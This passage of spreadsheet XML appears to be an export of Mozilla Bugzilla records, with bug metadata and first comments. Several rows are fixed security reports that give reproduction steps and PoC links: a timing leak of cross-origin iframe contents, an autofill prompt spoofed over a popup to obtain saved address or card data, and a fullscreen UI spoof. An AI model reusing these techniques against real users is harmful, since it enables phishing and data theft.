        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1945" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1945" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1945" t="n">
        <v>1</v>
      </c>
      <c r="U1945" t="n">
        <v>0</v>
      </c>
      <c r="V1945" t="n">
        <v>4</v>
      </c>
      <c r="W1945" t="inlineStr">
        <is>
          <t>:nalexander ran into a case where he was unable to update an [existing differential](https://phabricator.services.mozilla.com/D35623):
```
nalexander@roboto ~/M/gecko&gt; moz-phab submit 11e785f4 8d56e628
Submitting 4 commits for review:
(   New) 586628:8d56e628c506 Bug 1448428 - Part 4: Transition "HardwareCodecCapabilityUtils" away from "unified" GeneratedJNI{Natives,Wrappers}.h header. r?snorp
(   New) 586627:0eb0c7a01e21 Bug 1448428 - Part 3: Allow incremental transition away from "unified" GeneratedJNI{Natives,Wrappers}.h header. r?snorp
(   New) 586626:4f7dc00e09fc Bug 1448428 - Part 2: Maintain "unified" GeneratedJNI{Natives,Wrappers}.h header. r?snorp
(D35623) 586625:11e785f49d48 Bug 1448428 - Part 1: Split generated JNI wrappers into multiple files. r?snorp
Warning: found 49 untracked files (will not be submitted):
Automatically submitting (as per submit.auto_submit in ~/.moz-phab-config)Updating revision D35623:
586625:11e785f49d48 Bug 1448428 - Part 1: Split generated JNI wrappers into multiple files. r?snorp
Linting...
No lint engine configured for this project.
Running unit tests...
No unit test engine is configured for this project.
 SKIP STAGING  Phabricator does not support staging areas for this repository.
Updated an existing Differential revision:
        Revision URI: https://phabricator.services.mozilla.com/D35623Included changes:
  M       mobile/android/annotations/src/main/java/org/mozilla/gecko/annotationProcessors/AnnotationProcessor.java
  M       mobile/android/annotations/src/main/java/org/mozilla/gecko/annotationProcessors/classloader/ClassWithOptions.java
  M       widget/android/moz.build
ERR-CONDUIT-CORE: Validation errors:
  - You can not request review of this revision because this revision is already under review and the action would have no effect.
```
[Associated Slack context](https://mozilla.slack.com/archives/C52EG7AVA/p1578009551028900)</t>
        </is>
      </c>
      <c r="X1945" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1946">
      <c r="A1946" t="n">
        <v>950427</v>
      </c>
      <c r="B1946" t="inlineStr">
        <is>
          <t>2013-12-14 20:43:50 -0800</t>
        </is>
      </c>
      <c r="C1946" t="inlineStr">
        <is>
          <t>caretPositionFromPoint and elementFromPoint leak information about iframe contents via timing information</t>
        </is>
      </c>
      <c r="D1946" t="inlineStr">
        <is>
          <t>2015-02-25 20:46:51 -0800</t>
        </is>
      </c>
      <c r="E1946" t="n">
        <v>1</v>
      </c>
      <c r="F1946" t="n">
        <v>1</v>
      </c>
      <c r="G1946" t="n">
        <v>3</v>
      </c>
      <c r="H1946" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1946" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1946" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1946" t="inlineStr">
        <is>
          <t>26 Branch</t>
        </is>
      </c>
      <c r="L1946" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1946" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1946" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1946" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1946" t="inlineStr">
        <is>
          <t>[adv-main27+]</t>
        </is>
      </c>
      <c r="Q1946" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1946" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1946" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T1946" t="n">
        <v>0</v>
      </c>
      <c r="U1946" t="n">
        <v>0</v>
      </c>
      <c r="V1946" t="n">
        <v>27</v>
      </c>
      <c r="W1946" t="inlineStr">
        <is>
          <t>Created attachment 8347703
PoC demonstrating cross-origin DOM structure sniffing using *fromPoint().
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Steps to reproduce:
1. Create a page containing an iframe with a cross-domain src
2. Run document.elementFromPoint() or document.caretPositionFromPoint() across the iframe
3. View the page with Firefox
Actual results:
The time it takes for a *fromPoint() call to complete is heavily on the element under the point in the iframe. An attacker is able to get an approximate idea of how the iframe's DOM is arranged, as well as whether or not it has a scrollbar based solely on the timing information.
Expected results:
*fromPoint() should do a same-origin check before descending into the iframe's DOM if the src is of a different origin, eliminating the timing issues.</t>
        </is>
      </c>
      <c r="X1946" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1947">
      <c r="A1947" t="n">
        <v>1753341</v>
      </c>
      <c r="B1947" t="inlineStr">
        <is>
          <t>2022-02-02 17:39:09 -0800</t>
        </is>
      </c>
      <c r="C1947" t="inlineStr">
        <is>
          <t>Autofill prompt can render over cross-origin popup, allows spoofing of autofill context origin and browser UI</t>
        </is>
      </c>
      <c r="D1947" t="inlineStr">
        <is>
          <t>2023-10-17 20:49:04 -0700</t>
        </is>
      </c>
      <c r="E1947" t="n">
        <v>1</v>
      </c>
      <c r="F1947" t="n">
        <v>1</v>
      </c>
      <c r="G1947" t="n">
        <v>3</v>
      </c>
      <c r="H1947" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1947" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J1947" t="inlineStr">
        <is>
          <t>Autocomplete</t>
        </is>
      </c>
      <c r="K1947" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1947" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1947" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1947" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1947" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1947" t="inlineStr">
        <is>
          <t>[fixed by bug 1826622][adv-main113+]</t>
        </is>
      </c>
      <c r="Q1947" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1947" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1947" t="inlineStr">
        <is>
          <t>114 Branch</t>
        </is>
      </c>
      <c r="T1947" t="n">
        <v>1</v>
      </c>
      <c r="U1947" t="n">
        <v>0</v>
      </c>
      <c r="V1947" t="n">
        <v>11</v>
      </c>
      <c r="W1947" t="inlineStr">
        <is>
          <t>Created attachment 9262030
autofill-over-popup.mp4
VULNERABILITY DETAILS
Pages with carefully-positioned input fields can cause the browser to render autofill prompts over a cross-origin popup. This can be used to spoof the autofill context origin (by making the user think the prompt is associated with the popup's origin) or to spoof the address bar, cover/spoof permission prompts, cover window controls, or for other malicious purposes that involve covering the browser UI associated with the popup.
Depending on the autofill data targeted, either two or three user interactions are needed to initiate the attack.
A browser UI cover/spoof PoC would work similarly to bug 1753339, so I have not created separate PoCs for these scenarios. The root cause and fix may be the same as bug 1753339 but reporting separately due to different impacts and potentially different considerations.
VERSION
Firefox Version: 96.0.3 Stable (Build ID 20220126154723), 98.0a1 Nightly (Build ID 20220127094620)
Operating System:	Windows_NT 10.0 19042
REPRODUCTION CASE
See attached video with recording of all PoCs.
The credit card PoC requires less interactions and is more likely to succeed due to the browser automatically showing the autofill prompt when the attacker page is focused. In comparison, the browser requires an additional user interaction with the input field.
For the basic PoC, window resizing is required since the attacker page needs to have keyboard focus, and focusing the initial window puts it on top of the popup, so the popup cannot overlap the initial window. This is an implementation detail; an advanced PoC can open attacker page in another popup, which adds another click to the repro steps but is more feasible than asking the user to resize their window. In cases where the user's window is already appropriately sized, the advanced PoC can omit the extra popup/click.
Also see bug 1753339 for browser UI spoof PoCs that also work over popups.
PoC for address (multiple fields):
Prerequisite: Have at least one address in about:preferences#privacy -&gt; Forms and Autofill -&gt; Saved Addresses...
1. Resize window so it's not maximized. For this basic PoC, move the window to allow at least 300px on the left of the window. This is a PoC implementation detail.
2. Navigate to https://alesandroortiz.com/security/firefox/autofill-over-popup.html
3. Click twice anywhere in page.
4. Press down arrow once.
5. Use mouse or keyboard to select an autofill entry.
PoC for credit card (multiple fields):
Prerequisite: Have at least one credit card in about:preferences#privacy -&gt; Forms and Autofill -&gt; Saved Credit Cards...
1. Resize window so it's not maximized. For this basic PoC, move the window to allow at least 300px on the left of the window. This is a PoC implementation detail.
2. Navigate to https://alesandroortiz.com/security/firefox/autofill-over-popup.html?creditcard
3. Click twice anywhere in page.
4. Use mouse or keyboard to select an autofill entry.
For all PoCs:
Observed: Autofill prompt is shown over different origin. Upon selection with mouse or keyboard, data is provided to attacker page.
Expected: Autofill prompt is *not* shown over different origin.
CREDIT INFORMATION
Reporter credit: Alesandro Ortiz &lt;https://AlesandroOrtiz.com&gt;</t>
        </is>
      </c>
      <c r="X1947" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1948">
      <c r="A1948" t="n">
        <v>1454482</v>
      </c>
      <c r="B1948" t="inlineStr">
        <is>
          <t>2018-04-16 13:19:09 -0700</t>
        </is>
      </c>
      <c r="C1948" t="inlineStr">
        <is>
          <t>capture timings for elasticsearch indexing</t>
        </is>
      </c>
      <c r="D1948" t="inlineStr">
        <is>
          <t>2018-07-06 15:28:21 -0700</t>
        </is>
      </c>
      <c r="E1948" t="n">
        <v>1</v>
      </c>
      <c r="F1948" t="n">
        <v>1</v>
      </c>
      <c r="G1948" t="n">
        <v>4</v>
      </c>
      <c r="H1948" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1948" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1948" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1948" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1948" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1948" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1948" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1948" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1948" t="inlineStr"/>
      <c r="Q1948" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1948" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1948" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1948" t="n">
        <v>1</v>
      </c>
      <c r="U1948" t="n">
        <v>0</v>
      </c>
      <c r="V1948" t="n">
        <v>11</v>
      </c>
      <c r="W1948" t="inlineStr">
        <is>
          <t>We want better timing data for indexing documents in Elasticsearch as well as successes vs. saves. It's not sufficient to use the save_raw_and_crash benchmark wrapper since that method does a bunch of things--we just want indexing timings.
This bug covers wrapping the key parts of the elasticsearch crashstorage to cover that data.</t>
        </is>
      </c>
      <c r="X1948" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1949">
      <c r="A1949" t="n">
        <v>1213979</v>
      </c>
      <c r="B1949" t="inlineStr">
        <is>
          <t>2015-10-12 12:58:35 -0700</t>
        </is>
      </c>
      <c r="C1949" t="inlineStr">
        <is>
          <t>Heap-use-after-free [@ mozilla::net::Http2Stream::AdjustInitialWindow]</t>
        </is>
      </c>
      <c r="D1949" t="inlineStr">
        <is>
          <t>2016-07-02 11:29:05 -0700</t>
        </is>
      </c>
      <c r="E1949" t="n">
        <v>1</v>
      </c>
      <c r="F1949" t="n">
        <v>1</v>
      </c>
      <c r="G1949" t="n">
        <v>3</v>
      </c>
      <c r="H1949" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1949" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1949" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K1949" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1949" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1949" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1949" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1949" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1949" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main42+][adv-esr38.4+]</t>
        </is>
      </c>
      <c r="Q1949" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1949" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1949" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T1949" t="n">
        <v>1</v>
      </c>
      <c r="U1949" t="n">
        <v>0</v>
      </c>
      <c r="V1949" t="n">
        <v>25</v>
      </c>
      <c r="W1949" t="inlineStr">
        <is>
          <t>Created attachment 8672767
stack
My ASan build is crashing very frequently at [@ mozilla::net::Http2Stream::AdjustInitialWindow], especially when browsing Wikipedia.
Today's nightly is also crashing frequently, at seemingly random locations, especially when browsing Twitter.</t>
        </is>
      </c>
      <c r="X1949" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1950">
      <c r="A1950" t="n">
        <v>1364403</v>
      </c>
      <c r="B1950" t="inlineStr">
        <is>
          <t>2017-05-12 04:34:44 -0700</t>
        </is>
      </c>
      <c r="C1950" t="inlineStr">
        <is>
          <t>Find a suitable configuration of aps block for APNS/WebPush</t>
        </is>
      </c>
      <c r="D1950" t="inlineStr">
        <is>
          <t>2017-05-30 10:00:09 -0700</t>
        </is>
      </c>
      <c r="E1950" t="n">
        <v>1</v>
      </c>
      <c r="F1950" t="n">
        <v>1</v>
      </c>
      <c r="G1950" t="n">
        <v>2</v>
      </c>
      <c r="H1950" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1950" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J1950" t="inlineStr">
        <is>
          <t>Firefox Accounts</t>
        </is>
      </c>
      <c r="K1950" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1950" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M1950" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N1950" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1950" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1950" t="inlineStr">
        <is>
          <t>[MobileCore]</t>
        </is>
      </c>
      <c r="Q1950" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1950" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1950" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1950" t="n">
        <v>1</v>
      </c>
      <c r="U1950" t="n">
        <v>0</v>
      </c>
      <c r="V1950" t="n">
        <v>3</v>
      </c>
      <c r="W1950" t="inlineStr">
        <is>
          <t>This bug is to find a suitable configuration of aps block that works under load, can handle decryption, and syncing (or queueing of syncing); this will have implications about the alert that is displayed.
From :jrconlin
The following temporary hack will allow you to specify the 'aps' argument for registration. 
When calling the autopush HTTP registration endpoint
(e.g. https://updates-autopush.dev.mozaws.net/v1/apns/fennec/registration/ ), you can pass the 'aps' data block used by
https://developer.apple.com/library/content/documentation/NetworkingInternet/Conceptual/RemoteNotificationsPG/CreatingtheNotificationPayload.html#//apple_ref/doc/uid/TP40008194-CH10-SW1. This will assign the `aps` block to the UAID that autopush will assign to this connection. To change the `aps` information, the client will need to register a new UAID.
All messages sent via Autopush to the returned endpoint will use the `aps` block defined during registration. 
For example if you were to send
&gt; curl -X POST https://updates-autopush.dev.mozaws.net/v1/apns/fennec/registration/
&gt; {"token": "SomeToken", "aps":{"alert": "Hey-o!"}}
&lt; {"endpoint": "https://updates-autopush.dev.mozaws.net/wpush/v1/yabbadabba...", ...}
any subsequent sends to `https://updates-autopush.dev.mozaws.net/wpush/v1/yabbadabba...` should result in autopush using `{"aps":{"alert":"Hey-o!"},"body":...,,"con":..., ...}` to the APNS backend.
If no `aps` value is specified during connection, autopush will default to the existing `"aps":{"content-available":1}`</t>
        </is>
      </c>
      <c r="X1950" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1951">
      <c r="A1951" t="n">
        <v>467493</v>
      </c>
      <c r="B1951" t="inlineStr">
        <is>
          <t>2008-12-01 21:56:10 -0800</t>
        </is>
      </c>
      <c r="C1951" t="inlineStr">
        <is>
          <t>Crash [@ nsHTMLReflowState::GetHypotheticalBoxContainer] with -moz-column, overflow, clear, margin, fixed pos</t>
        </is>
      </c>
      <c r="D1951" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E1951" t="n">
        <v>1</v>
      </c>
      <c r="F1951" t="n">
        <v>1</v>
      </c>
      <c r="G1951" t="n">
        <v>3</v>
      </c>
      <c r="H1951" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1951" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1951" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1951" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1951" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1951" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1951" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1951" t="inlineStr">
        <is>
          <t>WORKSFORME</t>
        </is>
      </c>
      <c r="P1951" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1951" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1951" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1951" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1951" t="n">
        <v>1</v>
      </c>
      <c r="U1951" t="n">
        <v>0</v>
      </c>
      <c r="V1951" t="n">
        <v>31</v>
      </c>
      <c r="W1951" t="inlineStr">
        <is>
          <t>Created attachment 350921
testcase (crashes Firefox when loaded)
###!!! ASSERTION: bad height: 'Not Reached', file /Users/jruderman/central/layout/generic/nsLineLayout.cpp, line 188
###!!! ASSERTION: Placeholder relationship should have been torn down; see comments in nsPlaceholderFrame.h: '!shell-&gt;FrameManager()-&gt;GetPlaceholderFrameFor(mOutOfFlowFrame)', file /Users/jruderman/central/layout/generic/nsPlaceholderFrame.cpp, line 132
###!!! ASSERTION: Dead placeholder in placeholder map: 'entry-&gt;placeholderFrame-&gt;GetOutOfFlowFrame() != (void*)0xdddddddd', file /Users/jruderman/central/layout/base/nsFrameManager.cpp, line 137
###!!! ASSERTION: no placeholder frame: 'nsnull != placeholderFrame', file /Users/jruderman/central/layout/generic/nsHTMLReflowState.cpp, line 1140
Null deref [@ nsHTMLReflowState::GetHypotheticalBoxContainer], but the third assertion earns this bug a free [sg:critical?].
I suspect this is a recent regression, because I think I wasn't hitting this crash before last week.</t>
        </is>
      </c>
      <c r="X1951" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1952">
      <c r="A1952" t="n">
        <v>1262345</v>
      </c>
      <c r="B1952" t="inlineStr">
        <is>
          <t>2016-04-05 21:46:14 -0700</t>
        </is>
      </c>
      <c r="C1952" t="inlineStr">
        <is>
          <t>crash in RtlpWaitOnCriticalSection | RtlpEnterCriticalSectionContended | audioses.dll@0xccee</t>
        </is>
      </c>
      <c r="D1952" t="inlineStr">
        <is>
          <t>2016-04-25 17:59:31 -0700</t>
        </is>
      </c>
      <c r="E1952" t="n">
        <v>1</v>
      </c>
      <c r="F1952" t="n">
        <v>1</v>
      </c>
      <c r="G1952" t="n">
        <v>3</v>
      </c>
      <c r="H1952" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1952" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1952" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K1952" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1952" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1952" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N1952" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1952" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1952" t="inlineStr"/>
      <c r="Q1952" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1952" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1952" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1952" t="n">
        <v>1</v>
      </c>
      <c r="U1952" t="n">
        <v>0</v>
      </c>
      <c r="V1952" t="n">
        <v>9</v>
      </c>
      <c r="W1952" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-2f1d0581-5e26-4eee-9738-bb5152160405.
=============================================================
This crash has occurred 3 times in the latest Nightly (20160405030214), making it the #6 top crasher.
It ends up in system DLLs. The highest Mozilla frame on the stack is https://hg.mozilla.org/mozilla-central/annotate/d9f50aa0a1aa/dom/media/AudioStream.cpp#l691, which is at the very end of a function, which suggests a destructor is running? Not sure.</t>
        </is>
      </c>
      <c r="X1952" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1953">
      <c r="A1953" t="n">
        <v>1800203</v>
      </c>
      <c r="B1953" t="inlineStr">
        <is>
          <t>2022-11-10 23:52:00 -0800</t>
        </is>
      </c>
      <c r="C1953" t="inlineStr">
        <is>
          <t>fullscreen notification not shown when fullscreen lead to spoof (firefox focus - android)</t>
        </is>
      </c>
      <c r="D1953" t="inlineStr">
        <is>
          <t>2024-05-30 11:02:16 -0700</t>
        </is>
      </c>
      <c r="E1953" t="n">
        <v>1</v>
      </c>
      <c r="F1953" t="n">
        <v>1</v>
      </c>
      <c r="G1953" t="n">
        <v>2</v>
      </c>
      <c r="H1953" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1953" t="inlineStr">
        <is>
          <t>Focus</t>
        </is>
      </c>
      <c r="J1953" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1953" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1953" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1953" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1953" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1953" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1953" t="inlineStr">
        <is>
          <t xml:space="preserve">[reporter-external] [client-bounty-form] [verif?] [adv-main110+] </t>
        </is>
      </c>
      <c r="Q1953" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1953" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1953" t="inlineStr">
        <is>
          <t>111 Branch</t>
        </is>
      </c>
      <c r="T1953" t="n">
        <v>1</v>
      </c>
      <c r="U1953" t="n">
        <v>0</v>
      </c>
      <c r="V1953" t="n">
        <v>33</v>
      </c>
      <c r="W1953" t="inlineStr">
        <is>
          <t>Created attachment 9303025
pocfullscreen.mp4
I found a vulnerability in firefox focus- android when the web page in fullscreen state the fullscreen notification not shown  which can lead to spoof.
steps to produce
1.open http://103.186.0.20/poc2new.html or open poc2new.html
2. Click the open to google button
3  the fake web page is opened (fullscreen)
OS: Android 10 (Samsung M31)
Firefox Focus version: 106.1.0 (Build #362840108)
                                     106.0-20221010181815)
                                     AC :106.0.5, 5f06485fc3
                                     AS:94.2.1
i attached the poc video file.
thank you</t>
        </is>
      </c>
      <c r="X1953" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1954">
      <c r="A1954" t="n">
        <v>1354736</v>
      </c>
      <c r="B1954" t="inlineStr">
        <is>
          <t>2017-04-07 16:51:29 -0700</t>
        </is>
      </c>
      <c r="C1954" t="inlineStr">
        <is>
          <t>Setup WNP for Firefox 53.0 release</t>
        </is>
      </c>
      <c r="D1954" t="inlineStr">
        <is>
          <t>2017-08-01 05:58:36 -0700</t>
        </is>
      </c>
      <c r="E1954" t="n">
        <v>1</v>
      </c>
      <c r="F1954" t="n">
        <v>1</v>
      </c>
      <c r="G1954" t="n">
        <v>5</v>
      </c>
      <c r="H1954" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1954" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1954" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K1954" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1954" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1954" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1954" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1954" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1954" t="inlineStr">
        <is>
          <t>[releaseduty]</t>
        </is>
      </c>
      <c r="Q1954" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1954" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1954" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1954" t="n">
        <v>1</v>
      </c>
      <c r="U1954" t="n">
        <v>0</v>
      </c>
      <c r="V1954" t="n">
        <v>38</v>
      </c>
      <c r="W1954" t="inlineStr">
        <is>
          <t>Hello again Rail,
Please find this request to turn on WNP in Firefox 53.0 release.
We have a request to enable the /whatsnew page when desktop Firefox 53.0 ships to release.
In 1312551 , the request to show WNP in 50.0, there was the stated nuance of setting the URL to https://www.mozilla.org/%LOCALE%/firefox/50.0/whatsnew where %LOCALE% will be substituted by the updater. I wanted to be sure we captured that, updating the release # accordingly, in this request.
Please let me know if this request comes soon enough to make the 53 launch, as well as letting me know of any questions.</t>
        </is>
      </c>
      <c r="X1954" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1955">
      <c r="A1955" t="n">
        <v>1208059</v>
      </c>
      <c r="B1955" t="inlineStr">
        <is>
          <t>2015-09-24 07:32:22 -0700</t>
        </is>
      </c>
      <c r="C1955" t="inlineStr">
        <is>
          <t>crash in mozilla::plugins::PluginAsyncSurrogate::Cast on 42 beta, often with 0xffffffffe5e5e5e5 address</t>
        </is>
      </c>
      <c r="D1955" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E1955" t="n">
        <v>1</v>
      </c>
      <c r="F1955" t="n">
        <v>1</v>
      </c>
      <c r="G1955" t="n">
        <v>6</v>
      </c>
      <c r="H1955" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1955" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1955" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K1955" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1955" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1955" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N1955" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1955" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1955" t="inlineStr">
        <is>
          <t>[adv-main43+]</t>
        </is>
      </c>
      <c r="Q1955" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1955" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1955" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T1955" t="n">
        <v>1</v>
      </c>
      <c r="U1955" t="n">
        <v>0</v>
      </c>
      <c r="V1955" t="n">
        <v>22</v>
      </c>
      <c r="W1955" t="inlineStr">
        <is>
          <t>[Tracking Requested - why for this release]:
This bug was filed from the Socorro interface and is 
report bp-5397eb78-fe15-4051-b8c9-129862150924.
=============================================================
Top Stack Frames:
0 	xul.dll 	mozilla::plugins::PluginAsyncSurrogate::Cast(_NPP*) 	dom/plugins/ipc/PluginAsyncSurrogate.cpp
1 	xul.dll 	mozilla::plugins::PluginInstanceParent::PluginInstanceParent(mozilla::plugins::PluginModuleParent*, _NPP*, nsCString const&amp;, _NPNetscapeFuncs const*) 	dom/plugins/ipc/PluginInstanceParent.cpp
